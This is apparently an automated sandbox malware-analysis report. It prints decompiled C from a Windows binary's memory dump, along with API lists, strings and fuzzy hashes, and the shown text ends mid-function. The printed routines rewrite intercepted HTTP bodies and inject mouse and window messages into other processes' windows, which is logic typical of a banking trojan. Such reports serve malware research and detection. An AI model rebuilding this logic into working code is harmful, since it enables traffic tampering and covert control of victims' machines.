Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
String ID:
API String ID: 1699860549-0
Opcode ID: b1e30fe524973a513118a4083755fb0c4d68479e2d546d7bebe6913c5ab701de
Instruction ID: 79c4a75d3db085750ed02eccdb008617f6e76a9161a925b6184540af406312b7
Opcode Fuzzy Hash: b1e30fe524973a513118a4083755fb0c4d68479e2d546d7bebe6913c5ab701de
Instruction Fuzzy Hash: 4B21EC71B007019BD720ABB99D48F57B7EDAF44751F048939F965F72E0DB38E8488A28

Uniqueness

Uniqueness Score: -1.00%

Function 00415007, Relevance: 16.7, APIs: 6, Strings: 5, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00415007(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed char _v32;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t99;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;
				void* _t104;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				intOrPtr _t119;
				void* _t131;
				signed int _t139;
				void* _t149;
				struct _CRITICAL_SECTION* _t153;
				intOrPtr _t155;
				signed int _t168;
				signed int _t174;
				char _t176;
				void* _t177;
				intOrPtr _t179;
				void* _t182;
				signed int _t183;
				intOrPtr _t186;
				void* _t188;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;

				_t99 = E00412FEE();
				_t179 = _a4;
				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
					L40:
					_t100 =  *0x423e64(_t179, _a8, _a12);
					goto L41;
				} else {
					_t153 = 0x423e40;
					EnterCriticalSection(0x423e40);
					_t101 = E004143A5(_t179);
					if(_t101 == 0xffffffff) {
						L39:
						LeaveCriticalSection(_t153);
						goto L40;
					}
					_t103 = _t101 * 0x38 +  *0x423e5c;
					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
						L32:
						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
						_t85 = _t103 + 0x2c; // -4341296
						_t173 = _t85;
						__eflags = _a12 - _t182;
						_t183 =  <  ? _a12 : _t182;
						_t104 = E00406EC1(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
							E00406F38(E00406E85( *_t173), _t173, 0, 0xc);
						}
						LeaveCriticalSection(_t153);
						_t100 = _t183;
						L41:
						return _t100;
					}
					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
						goto L39;
					}
					LeaveCriticalSection(0x423e40);
					_t107 =  *0x423e64(_t179, _a8, _a12);
					_v52 = _t107;
					if(_t107 <= 0xffffffff) {
						L38:
						_t100 = _v52;
						goto L41;
					}
					EnterCriticalSection(0x423e40);
					_t108 = E004143A5(_t179);
					_t174 = _t108;
					if(_t174 == 0xffffffff) {
						L35:
						_push(8);
						_push(0xffffe890);
						L36:
						 *0x423e3c();
						_v52 = _v52 | 0xffffffff;
						L37:
						LeaveCriticalSection(_t153);
						goto L38;
					}
					_t168 = _v52;
					if(_t168 == 0) {
						L11:
						_t176 = _t174 * 0x38 +  *0x423e5c;
						_v36 = _t176;
						if(_t168 > 0) {
							E00406EC1( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
						}
						_t110 = E00414C2B(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
						_v52 = _t110;
						if(_t110 == 1) {
							_t119 = E00414DD5( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t119;
							if(_t119 == 1) {
								if(E0041B69B( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
									_t155 = _v40;
									_t186 = E00406E55( *((intOrPtr*)(_t176 + 0x18)) - _v8 + _v12 + _t155 + 0x14);
									_v40 = _t186;
									if(_t186 != 0) {
										_t131 = E00406EC1(_t186,  *((intOrPtr*)(_t176 + 0x14)), _v12);
										_push(_t155);
										if((_v32 & 0x00000002) == 0) {
											E0040762E( &_v32);
											_t188 = E0040BE28(_t186, _v16, "Content-Length",  &_v36) + _v60;
											E00406EC1(_t188, _v68, _t155);
											_t189 = _t188 + _t155;
											__eflags = _t189;
										} else {
											_push("%x\r\n");
											_t191 = _t186 + _t131;
											_t177 = 0xd;
											_t192 = _t191 + E00407BBC(_t131, _t177, _t191);
											E00406EC1(_t192, _v48, _t155);
											_t193 = _t192 + _t155;
											E00406EC1(_t193, "\r\n0\r\n\r\n", 7);
											_t176 = _v60;
											_t189 = _t193 + 7;
										}
										_t137 =  *((intOrPtr*)(_t176 + 0x18));
										if(_v8 !=  *((intOrPtr*)(_t176 + 0x18))) {
											_t189 = _t189 + E00406EC1(_t189,  *((intOrPtr*)(_t176 + 0x14)) + _v8, _t137 - _v8);
										}
										E00406E85( *((intOrPtr*)(_t176 + 0x14)));
										_t139 = _v44;
										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
									}
								}
								_v44 = _v44 | 0xffffffff;
								E00406E85(_v48);
							}
							_t153 = 0x423e40;
						}
						if(_v52 <= 0) {
							L29:
							if(__eflags == 0) {
								L31:
								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
								 *((intOrPtr*)(_t176 + 0x34)) = 0;
								 *((intOrPtr*)(_t176 + 0x14)) = 0;
								 *((intOrPtr*)(_t176 + 0x18)) = 0;
								E0041BBB9( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
								_t103 = _v40;
								 *((intOrPtr*)(_t176 + 0x10)) = 0;
								 *((intOrPtr*)(_t176 + 0xc)) = 0;
								goto L32;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L37;
							}
							goto L31;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L29;
							}
							_push(0);
							_push(0xffffe892);
							goto L36;
						}
					}
					_t149 = _t108 * 0x38 +  *0x423e5c;
					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
					_t11 = _t149 + 0x14; // -4341320
					if(E00406E10( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
						goto L35;
					}
					_t168 = _v52;
					goto L11;
				}
			}

0x00415013
0x00415018
0x0041501d
0x0041530a
0x00415311
0x00000000
0x00415037
0x0041503d
0x00415043
0x00415045
0x0041504d
0x00415303
0x00415304
0x00000000
0x00415304
0x00415056
0x00415060
0x0041529c
0x0041529f
0x004152a2
0x004152a2
0x004152a5
0x004152aa
0x004152b6
0x004152bb
0x004152c1
0x004152c4
0x004152d2
0x004152d2
0x004152d8
0x004152de
0x0041531a
0x00415320
0x00415320
0x0041506a
0x00000000
0x00000000
0x00415071
0x0041507e
0x00415087
0x0041508e
0x004152fd
0x004152fd
0x00000000
0x004152fd
0x00415095
0x00415097
0x0041509c
0x004150a1
0x004152e2
0x004152e2
0x004152e4
0x004152e9
0x004152e9
0x004152ef
0x004152f6
0x004152f7
0x00000000
0x004152f7
0x004150a7
0x004150ad
0x004150d1
0x004150d4
0x004150da
0x004150e0
0x004150ed
0x004150f2
0x004150f2
0x004150ff
0x00415104
0x0041510b
0x0041512f
0x00415134
0x0041513b
0x0041515b
0x00415168
0x00415179
0x0041517b
0x00415181
0x00415190
0x0041519a
0x0041519b
0x004151d7
0x004151f7
0x004151fc
0x00415201
0x00415201
0x0041519d
0x0041519d
0x004151a4
0x004151a6
0x004151b3
0x004151b6
0x004151c2
0x004151c5
0x004151ca
0x004151ce
0x004151ce
0x00415203
0x0041520a
0x0041521f
0x0041521f
0x00415224
0x00415229
0x0041522f
0x00415232
0x00415232
0x00415181
0x00415239
0x0041523e
0x0041523e
0x00415243
0x00415243
0x0041524e
0x00415265
0x00415265
0x00415272
0x00415278
0x0041527e
0x00415284
0x00415287
0x0041528a
0x0041528d
0x00415292
0x00415296
0x00415299
0x00000000
0x00415299
0x00415267
0x0041526c
0x00000000
0x00000000
0x00000000
0x00415250
0x00415254
0x00415261
0x00000000
0x00415261
0x00415256
0x00415257
0x00000000
0x00415257
0x0041524e
0x004150b2
0x004150bb
0x004150bd
0x004150c7
0x00000000
0x00000000
0x004150cd
0x00000000
0x004150cd

APIs

Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6

EnterCriticalSection.KERNEL32(00423E40), ref: 00415043
LeaveCriticalSection.KERNEL32(00423E40), ref: 00415071
EnterCriticalSection.KERNEL32(00423E40), ref: 00415095
LeaveCriticalSection.KERNEL32(00423E40,00000000,?,00000000), ref: 004152D8
LeaveCriticalSection.KERNEL32(00423E40), ref: 004152F7

Part of subcall function 0040BE28: StrCmpNIA.SHLWAPI(?,?,?,?,?), ref: 0040BE82

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

LeaveCriticalSection.KERNEL32(00423E40), ref: 00415304

Strings

@>B, xrefs: 00415243
%x, xrefs: 0041519D
0, xrefs: 004151BD
@>B, xrefs: 0041503D
Content-Length, xrefs: 004151E1

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
String ID: 0$%x$@>B$@>B$Content-Length
API String ID: 4067213518-3457078964
Opcode ID: af7a739ba4d56f59fe3186e5c7f44e3dc41d65d07cf364273b804ab0ed973fd4
Instruction ID: 12002e27cdff033a2eeaf141f9b20eba5626d8e06b844517c3c69709ea2a09e7
Opcode Fuzzy Hash: af7a739ba4d56f59fe3186e5c7f44e3dc41d65d07cf364273b804ab0ed973fd4
Instruction Fuzzy Hash: 7B91C172504701EFCB10DF25C88199ABBB4FF84314F01062AF855A32A1D778E9A5CFDA

Uniqueness

Uniqueness Score: -1.00%

Function 00405885, Relevance: 16.6, APIs: 11, Instructions: 118
synchronizationthreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405885(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
				char _v5;
				long _v12;
				signed char _v16;
				struct tagRECT _v32;
				char _v140;
				void* __ebx;
				void* __esi;
				signed char _t47;
				intOrPtr _t52;
				void* _t85;
				RECT* _t89;

				_t89 = __edi;
				_t86 = __ecx;
				_t85 = __eax;
				_t47 = E0040D568(_a4) & 0x0000ffff;
				_v16 = _t47;
				if((_t47 & 0x00000001) != 0) {
					L16:
					return 1;
				}
				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
					_v5 = 0;
				} else {
					_t86 =  &_v140;
					E0040B4DE( &_v140, _t85 + 0x3c, _v12, _t85 + 0x50, 2);
					_v5 = E0040A668( &_v140);
				}
				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
					L8:
					if(E00405723(_t85, _t86) == 0) {
						L14:
						_t52 = _a8;
						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
							IntersectRect( &_v32, _t52 + 4, _t89);
							FillRect( *(_t85 + 0x154),  &_v32, 6);
							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
						}
						goto L16;
					}
					E00406EC1( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
					ResetEvent( *(_t85 + 0xc));
					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
						goto L14;
					}
					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
						TerminateProcess( *(_t85 + 0x17c), 0);
						E00408894(_t85 + 0x17c);
						goto L14;
					}
					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
						goto L14;
					}
					return _v5;
				} else {
					ResetEvent( *(_t85 + 0xc));
					_t86 = _t89->left & 0x0000ffff;
					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
						goto L8;
					} else {
						goto L16;
					}
				}
			}

0x00405885
0x00405885
0x00405893
0x0040589a
0x0040589d
0x004058a2
0x004059ee
0x00000000
0x004059ee
0x004058b7
0x004058e5
0x004058b9
0x004058c9
0x004058cf
0x004058e0
0x004058e0
0x004058f3
0x0040593e
0x00405945
0x004059ad
0x004059ad
0x004059b7
0x004059c2
0x004059d4
0x004059e8
0x004059e8
0x00000000
0x004059b7
0x00405953
0x0040595b
0x00405973
0x00000000
0x00000000
0x00405985
0x004059a2
0x004059a8
0x00000000
0x004059a8
0x00405991
0x00000000
0x00000000
0x00000000
0x004058fb
0x004058fe
0x0040590d
0x00405929
0x00000000
0x00000000
0x00000000
0x00000000
0x00405929

APIs

Part of subcall function 0040D568: GetClassNameW.USER32 ref: 0040D583

GetWindowThreadProcessId.USER32(?,?), ref: 004058AF
ResetEvent.KERNEL32(00000010), ref: 004058FE
PostMessageW.USER32(?,?,?,00000010), ref: 00405921
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00405930
ResetEvent.KERNEL32(?,?,?,00000010), ref: 0040595B
PostThreadMessageW.USER32 ref: 0040596B
WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 0040597D

Part of subcall function 0040B4DE: StringFromGUID2.OLE32(00000000,?,00000028,00412EC2,?,00000010,00000000,77E49EB0), ref: 0040B57F

Part of subcall function 0040A668: OpenMutexW.KERNEL32(00100000,00000000,00000000,00413832,?,19367401,?,00000001,8889347B,00000002), ref: 0040A673
Part of subcall function 0040A668: CloseHandle.KERNEL32(00000000), ref: 0040A67E

TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 004059A2

Part of subcall function 00408894: CloseHandle.KERNEL32(?,74B5F560,0040D90F,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004088A3
Part of subcall function 00408894: CloseHandle.KERNEL32(?,74B5F560,0040D90F,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004088AC

IntersectRect.USER32 ref: 004059C2
FillRect.USER32 ref: 004059D4
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 004059E8

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
String ID:
API String ID: 2453266691-0
Opcode ID: 62988674af14cea373825c9a8720870a54d7227a4d4adfa5cf60c2b4c248b7a5
Instruction ID: 9e877e76457d3a6406cc9f9d6e6ab1a25c1c591600ec113dc4b7f21c8b52fff7
Opcode Fuzzy Hash: 62988674af14cea373825c9a8720870a54d7227a4d4adfa5cf60c2b4c248b7a5
Instruction Fuzzy Hash: 1C417B71900208FBEF109F60CC45BAA7BB8EF04354F0480B6F944FA1A2DB79D955DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040FEED, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040FEED(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
				struct HWND__* _v8;
				char _v12;
				struct HWND__* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				intOrPtr _v68;
				struct tagWINDOWINFO _v92;
				void* __ebx;
				void* __esi;
				intOrPtr _t107;
				struct HWND__* _t108;
				int _t113;
				int _t114;
				signed char _t143;
				struct HWND__* _t144;
				long _t147;
				struct HWND__* _t170;
				long _t171;
				void* _t174;

				_t174 = __eax;
				_t107 =  *((intOrPtr*)(__eax + 0x10));
				_v16 = 0;
				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
					_t108 =  *((intOrPtr*)(_t107 + 0x108));
					_v16 = _t108;
					if(_t108 != 0) {
						_v32 = E0040D915(0, __eax, 0) & 0x0000ffff;
					} else {
						_v32 = 0;
					}
				} else {
					if((_a4 & 0x00000001) != 0) {
						E0040FA5F(_a12, _a8, __eax);
						_a4 = _a4 & 0xfffffffe;
					}
					if((_a4 & 0x00000004) != 0) {
						E0040F9F0(0, _t174, 0, 0, 1);
					}
				}
				_t143 = _a4;
				 *( *(_t174 + 0x10) + 0x100) = _a8;
				_t113 =  *(_t174 + 0x10);
				 *(_t113 + 0x104) = _a12;
				if(_t143 == 0) {
					L69:
					return _t113;
				}
				_v20 = _t143;
				_t26 =  &_v20;
				 *_t26 = _v20 & 0x00000002;
				if( *_t26 == 0) {
					if((_t143 & 0x00000004) == 0) {
						goto L14;
					} else {
						_push(0);
						goto L13;
					}
				} else {
					_push(1);
					L13:
					E0040D915(1, _t174);
					L14:
					_v24 = _t143;
					_t31 =  &_v24;
					 *_t31 = _v24 & 0x00000020;
					if( *_t31 == 0) {
						if((_t143 & 0x00000040) == 0) {
							L19:
							_v28 = _t143;
							_t36 =  &_v28;
							 *_t36 = _v28 & 0x00000008;
							if( *_t36 == 0) {
								if((_t143 & 0x00000010) == 0) {
									L24:
									_t114 =  *(_t174 + 0x10);
									_push( *((intOrPtr*)(_t114 + 0x104)));
									_push( *((intOrPtr*)(_t114 + 0x100)));
									0xc00000 = 0x64;
									_t170 = E0040B5BA(0xc00000,  &_v12);
									_t113 = _v12 + 0xfffffff6;
									_v8 = _t170;
									if(_t113 <= 7) {
										_t113 = GetWindowLongW(_t170, 0xfffffff0);
										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
											_t113 = GetParent(_t170);
											if(_t113 != 0) {
												_v8 = _t113;
												_t170 = _t113;
											}
										}
									}
									if(_t170 == 0) {
										L35:
										_t144 = _v16;
										if(_t144 != 0) {
											_t113 = IsWindow(_t144);
											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
												if(_a4 != 0x8001) {
													_t113 = E0040F9F0(0, _t174, 0, 0, 1);
												}
											} else {
												_v8 = _t144;
												_v12 = 1;
												_t170 = _t144;
											}
										}
										goto L43;
									} else {
										_t113 = E0040D568(_t170);
										if((_t113 & 0x00000040) == 0) {
											goto L35;
										}
										if(_t170 != _v16) {
											_t113 = E0040F9F0(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
										}
										_v12 = 1;
										L43:
										if(_t170 == 0) {
											goto L69;
										}
										_v92.cbSize = 0x3c;
										_t113 = GetWindowInfo(_t170,  &_v92);
										if(_t113 == 0) {
											goto L69;
										}
										_t113 = _a8 & 0x0000ffff;
										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
										if(_v12 != 1) {
											_t171 = _a4;
										} else {
											_t113 = E0040D568(_t170);
											if((_t113 & 0x00000020) == 0) {
												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
											} else {
												_t171 = _t147;
											}
										}
										if(_v20 == 0) {
											if((_a4 & 0x00000004) == 0) {
												goto L55;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa2);
											_push(0x202);
											goto L54;
										} else {
											_push(_t147);
											_push(_t171);
											_push(0xa1);
											_push(0x201);
											L54:
											_push(_v12);
											_push( &_v92);
											_push(_v8);
											_t113 = E0040FC5F(_t174, 0xc00000);
											L55:
											if(_v24 == 0) {
												if((_a4 & 0x00000040) == 0) {
													L60:
													if(_v28 == 0) {
														if((_a4 & 0x00000010) == 0) {
															L65:
															if((_a4 & 0x00000001) != 0) {
																_t113 = E0040FC5F(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
															}
															if((_a4 & 0x00000800) != 0) {
																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E0040D915(0, _t174, 0) & 0x0000ffff, _t147);
															}
															goto L69;
														}
														_push(_t147);
														_push(_t171);
														_push(0xa5);
														_push(0x205);
														L64:
														_push(_v12);
														_push( &_v92);
														_push(_v8);
														_t113 = E0040FC5F(_t174, 0xc00000);
														goto L65;
													}
													_push(_t147);
													_push(_t171);
													_push(0xa4);
													_push(0x204);
													goto L64;
												}
												_push(_t147);
												_push(_t171);
												_push(0xa8);
												_push(0x208);
												L59:
												_push(_v12);
												_push( &_v92);
												_push(_v8);
												_t113 = E0040FC5F(_t174, 0xc00000);
												goto L60;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa7);
											_push(0x207);
											goto L59;
										}
									}
								}
								_push(0);
								L23:
								E0040D915(2, _t174);
								goto L24;
							}
							_push(1);
							goto L23;
						}
						_push(0);
						L18:
						E0040D915(4, _t174);
						goto L19;
					}
					_push(1);
					goto L18;
				}
			}

0x0040fef5
0x0040fef7
0x0040fefd
0x0040ff07
0x0040ff33
0x0040ff39
0x0040ff3e
0x0040ff52
0x0040ff40
0x0040ff40
0x0040ff40
0x0040ff09
0x0040ff0d
0x0040ff17
0x0040ff1c
0x0040ff1c
0x0040ff24
0x0040ff2c
0x0040ff2c
0x0040ff24
0x0040ff5b
0x0040ff5e
0x0040ff64
0x0040ff6a
0x0040ff72
0x004101f6
0x004101fa
0x004101fa
0x0040ff78
0x0040ff7b
0x0040ff7b
0x0040ff7f
0x0040ff88
0x00000000
0x0040ff8a
0x0040ff8a
0x00000000
0x0040ff8a
0x0040ff81
0x0040ff81
0x0040ff8b
0x0040ff8f
0x0040ff94
0x0040ff94
0x0040ff97
0x0040ff97
0x0040ff9b
0x0040ffa4
0x0040ffb0
0x0040ffb0
0x0040ffb3
0x0040ffb3
0x0040ffb7
0x0040ffc0
0x0040ffcc
0x0040ffcc
0x0040ffcf
0x0040ffd8
0x0040ffe0
0x0040ffe6
0x0040ffeb
0x0040ffee
0x0040fff4
0x0040fff9
0x00410004
0x0041001b
0x00410023
0x00410025
0x00410028
0x00410028
0x00410023
0x00410004
0x0041002c
0x0041005b
0x0041005b
0x00410060
0x00410063
0x0041006b
0x00410090
0x0041009a
0x0041009a
0x0041007b
0x0041007b
0x0041007e
0x00410085
0x00410085
0x0041006b
0x00000000
0x0041002e
0x0041002f
0x00410036
0x00000000
0x00000000
0x0041003b
0x0041004d
0x0041004d
0x00410052
0x0041009f
0x004100a1
0x00000000
0x00000000
0x004100ac
0x004100b3
0x004100bb
0x00000000
0x00000000
0x004100c5
0x004100cc
0x004100d2
0x004100fb
0x004100d4
0x004100d5
0x004100dc
0x004100f4
0x004100f7
0x004100de
0x004100de
0x004100de
0x004100dc
0x00410102
0x00410116
0x00000000
0x00000000
0x00410118
0x00410119
0x0041011a
0x0041011f
0x00000000
0x00410104
0x00410104
0x00410105
0x00410106
0x0041010b
0x00410124
0x00410124
0x0041012a
0x0041012b
0x00410130
0x00410135
0x00410139
0x0041014d
0x0041016c
0x00410170
0x00410184
0x004101a3
0x004101a7
0x004101c1
0x004101c1
0x004101cd
0x004101f0
0x004101f0
0x00000000
0x004101cd
0x00410186
0x00410187
0x00410188
0x0041018d
0x00410192
0x00410192
0x00410198
0x00410199
0x0041019e
0x00000000
0x0041019e
0x00410172
0x00410173
0x00410174
0x00410179
0x00000000
0x00410179
0x0041014f
0x00410150
0x00410151
0x00410156
0x0041015b
0x0041015b
0x00410161
0x00410162
0x00410167
0x00000000
0x00410167
0x0041013b
0x0041013c
0x0041013d
0x00410142
0x00000000
0x00410142
0x00410102
0x0041002c
0x0040ffc2
0x0040ffc3
0x0040ffc7
0x00000000
0x0040ffc7
0x0040ffb9
0x00000000
0x0040ffb9
0x0040ffa6
0x0040ffa7
0x0040ffab
0x00000000
0x0040ffab
0x0040ff9d
0x00000000
0x0040ff9d

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 0040FFF9
GetParent.USER32(00000000), ref: 0041001B
GetWindowThreadProcessId.USER32(?,00000000), ref: 00410040
IsWindow.USER32(?), ref: 00410063

Part of subcall function 0040FA5F: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040FA73
Part of subcall function 0040FA5F: ReleaseMutex.KERNEL32(?), ref: 0040FA92
Part of subcall function 0040FA5F: GetWindowRect.USER32 ref: 0040FA9F
Part of subcall function 0040FA5F: IsRectEmpty.USER32(?), ref: 0040FB23
Part of subcall function 0040FA5F: GetWindowLongW.USER32(?,000000F0), ref: 0040FB32
Part of subcall function 0040FA5F: GetParent.USER32(?), ref: 0040FB48
Part of subcall function 0040FA5F: MapWindowPoints.USER32 ref: 0040FB51
Part of subcall function 0040FA5F: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040FB75

GetWindowInfo.USER32 ref: 004100B3
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 004101F0

Part of subcall function 0040F9F0: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040FE29,00000000), ref: 0040F9F6
Part of subcall function 0040F9F0: ReleaseMutex.KERNEL32(?), ref: 0040FA2A
Part of subcall function 0040F9F0: IsWindow.USER32(?), ref: 0040FA31
Part of subcall function 0040F9F0: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040FA4B

Strings

@, xrefs: 00410149
<, xrefs: 004100AC
, xrefs: 0040FF97

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
String ID: $<$@
API String ID: 3705211839-2197183666
Opcode ID: 715f71e9e4daf49d519521859bdbe5b0cf0f0fbc8392d9b830686bac24821e8a
Instruction ID: da4b8684fd11d9f9c427d21c9de8b80ca785c36d5a629289bcd1a4ad511cff4d
Opcode Fuzzy Hash: 715f71e9e4daf49d519521859bdbe5b0cf0f0fbc8392d9b830686bac24821e8a
Instruction Fuzzy Hash: AB91A070600309BBEB219E95C889BFF7BB4AB45B08F14403AF9446A2D1C7BD9AC5D758

Uniqueness

Uniqueness Score: -1.00%

Function 0040E685, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 216
filestringCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E0040E685(WCHAR* __ecx, signed char* _a4) {
				char _v268;
				char _v549;
				signed short _v652;
				signed short _v792;
				char _v1044;
				short _v1564;
				short _v1568;
				intOrPtr _v1572;
				signed char* _v1576;
				signed int _v1580;
				char* _v1584;
				void* _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				char _v1600;
				intOrPtr _v1604;
				signed int _v1608;
				signed int _v1612;
				void* _v1613;
				signed int _v1616;
				void* __ebx;
				void* __esi;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t80;
				signed int _t83;
				long _t84;
				long _t85;
				signed int _t89;
				signed int _t101;
				signed int _t108;
				signed int _t110;
				WCHAR* _t123;
				signed char _t125;
				signed char* _t131;
				signed int _t134;
				void* _t136;
				void* _t140;
				signed int _t141;

				_t128 = __ecx;
				_t131 = _a4;
				_t60 = E00412EC8(__ecx,  *_t131, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
				_v1612 = _t60;
				if(_t60 != 0) {
					_v1588 =  *0x423e2c;
					_v1584 =  &_v268;
					_v1596 = E0040E4E1;
					_v1592 = E0040E61D;
					_v1576 = _t131;
					E00413167( &_v1044);
					E00406EC1( &_v268,  &_v549, 0x102);
					_t69 =  *_t131 & 0x000000ff;
					__eflags = _t69;
					if(_t69 == 0) {
						_t71 = _v652 >> 0x10;
						__eflags = _t71;
						_v1612 = _t71;
